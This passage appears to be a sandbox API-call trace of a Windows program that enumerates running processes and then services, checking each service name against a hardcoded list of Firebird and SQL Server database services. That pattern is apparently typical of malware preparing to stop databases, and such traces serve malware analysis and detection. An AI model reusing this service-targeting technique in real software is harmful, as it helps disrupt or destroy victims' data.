th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0173.054] lstrlenW (lpString="miniature.exe") returned 13 [0173.054] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0173.055] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0173.055] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0173.056] lstrlenW (lpString="operation-environments.exe") returned 26 [0173.056] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.056] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0173.056] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.057] lstrlenW (lpString="taskhostw.exe") returned 13 [0173.057] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0173.058] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0173.058] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0173.059] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0173.059] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.060] lstrlenW (lpString="conhost.exe") returned 11 [0173.060] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.061] lstrlenW (lpString="sppsvc.exe") returned 10 [0173.061] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0173.062] lstrlenW (lpString="dllhost.exe") returned 11 [0173.062] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0173.063] lstrlenW (lpString="wdgmug.exe") returned 10 [0173.063] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.063] lstrlenW (lpString="cmd.exe") returned 7 [0173.063] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.064] lstrlenW (lpString="conhost.exe") returned 11 [0173.064] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0173.065] lstrlenW (lpString="sc.exe") returned 6 [0173.065] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.066] lstrlenW (lpString="conhost.exe") returned 11 [0173.066] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0173.066] lstrlenW (lpString="WMIADAP.exe") returned 11 [0173.066] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0173.067] CloseHandle (hObject=0x340) returned 1 [0173.067] Sleep (dwMilliseconds=0x1f4) [0173.599] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ed90 [0173.599] EnumServicesStatusExW (in: hSCManager=0x74ed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0173.599] GetLastError () returned 0xea [0173.600] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1d8a) returned 0x32c9280 [0173.600] EnumServicesStatusExW (in: hSCManager=0x74ed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x32c9280, cbBufSize=0x1d8a, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x32c9280, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0173.601] CloseServiceHandle (hSCObject=0x74ed90) returned 1 [0173.601] lstrlenW (lpString="Appinfo") returned 7 [0173.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0173.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0173.601] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0173.601] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0173.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0173.601] lstrlenW (lpString="AppXSvc") returned 7 [0173.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0173.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0173.601] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0173.601] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0173.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0173.601] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0173.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0173.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0173.602] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0173.602] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0173.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0173.602] lstrlenW (lpString="Audiosrv") returned 8 [0173.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0173.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0173.602] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0173.602] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0173.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0173.602] lstrlenW (lpString="BFE") returned 3 [0173.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0173.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0173.602] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0173.602] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0173.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0173.602] lstrlenW (lpString="BITS") returned 4 [0173.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0173.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0173.602] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0173.602] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0173.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0173.602] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0173.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0173.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0173.602] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0173.602] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0173.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0173.602] lstrlenW (lpString="CDPSvc") returned 6 [0173.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0173.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0173.602] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0173.602] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0173.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0173.602] lstrlenW (lpString="ClickToRunSvc") returned 13 [0173.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0173.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0173.603] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0173.603] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0173.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0173.603] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0173.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0173.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0173.603] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0173.603] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0173.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0173.603] lstrlenW (lpString="CryptSvc") returned 8 [0173.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0173.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0173.603] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0173.603] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0173.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0173.603] lstrlenW (lpString="DcomLaunch") returned 10 [0173.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0173.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0173.603] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0173.603] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0173.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0173.603] lstrlenW (lpString="Dhcp") returned 4 [0173.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0173.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0173.603] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0173.603] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0173.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0173.603] lstrlenW (lpString="Dnscache") returned 8 [0173.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0173.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0173.603] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0173.603] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0173.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0173.603] lstrlenW (lpString="DoSvc") returned 5 [0173.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0173.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0173.604] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0173.604] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0173.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0173.604] lstrlenW (lpString="DPS") returned 3 [0173.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0173.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0173.604] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0173.604] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0173.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0173.604] lstrlenW (lpString="DusmSvc") returned 7 [0173.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0173.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0173.604] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0173.604] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0173.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0173.604] lstrlenW (lpString="EventLog") returned 8 [0173.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0173.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0173.604] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0173.604] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0173.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0173.604] lstrlenW (lpString="EventSystem") returned 11 [0173.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0173.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0173.604] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0173.604] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0173.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0173.604] lstrlenW (lpString="FontCache") returned 9 [0173.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0173.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0173.604] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0173.604] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0173.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0173.605] lstrlenW (lpString="gpsvc") returned 5 [0173.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0173.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0173.605] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0173.605] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0173.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0173.605] lstrlenW (lpString="iphlpsvc") returned 8 [0173.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0173.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0173.605] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0173.605] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0173.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0173.605] lstrlenW (lpString="KeyIso") returned 6 [0173.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0173.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0173.605] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0173.605] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0173.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0173.605] lstrlenW (lpString="LanmanServer") returned 12 [0173.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0173.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0173.605] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0173.605] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0173.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0173.605] lstrlenW (lpString="LanmanWorkstation") returned 17 [0173.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0173.605] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0173.605] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0173.605] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0173.605] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0173.605] lstrlenW (lpString="lfsvc") returned 5 [0173.605] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0173.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0173.606] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0173.606] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0173.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0173.606] lstrlenW (lpString="lmhosts") returned 7 [0173.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0173.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0173.606] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0173.606] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0173.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0173.606] lstrlenW (lpString="LSM") returned 3 [0173.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0173.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0173.606] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0173.606] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0173.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0173.606] lstrlenW (lpString="MpsSvc") returned 6 [0173.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0173.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0173.606] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0173.606] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0173.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0173.606] lstrlenW (lpString="NcbService") returned 10 [0173.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0173.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0173.606] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0173.606] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0173.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0173.607] lstrlenW (lpString="netprofm") returned 8 [0173.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0173.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0173.607] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0173.607] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0173.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0173.607] lstrlenW (lpString="NlaSvc") returned 6 [0173.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0173.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0173.607] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0173.607] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0173.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0173.607] lstrlenW (lpString="nsi") returned 3 [0173.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0173.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0173.607] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0173.607] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0173.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0173.607] lstrlenW (lpString="PcaSvc") returned 6 [0173.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0173.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0173.607] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0173.607] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0173.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0173.607] lstrlenW (lpString="PlugPlay") returned 8 [0173.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0173.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0173.607] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0173.608] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0173.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0173.608] lstrlenW (lpString="Power") returned 5 [0173.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0173.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0173.608] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0173.608] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0173.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0173.608] lstrlenW (lpString="ProfSvc") returned 7 [0173.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0173.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0173.608] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0173.608] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0173.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0173.608] lstrlenW (lpString="RpcEptMapper") returned 12 [0173.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0173.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0173.608] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0173.608] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0173.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0173.608] lstrlenW (lpString="RpcSs") returned 5 [0173.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0173.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0173.608] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0173.608] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0173.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0173.608] lstrlenW (lpString="SamSs") returned 5 [0173.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0173.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0173.608] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0173.608] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0173.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0173.609] lstrlenW (lpString="Schedule") returned 8 [0173.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0173.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0173.609] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0173.609] 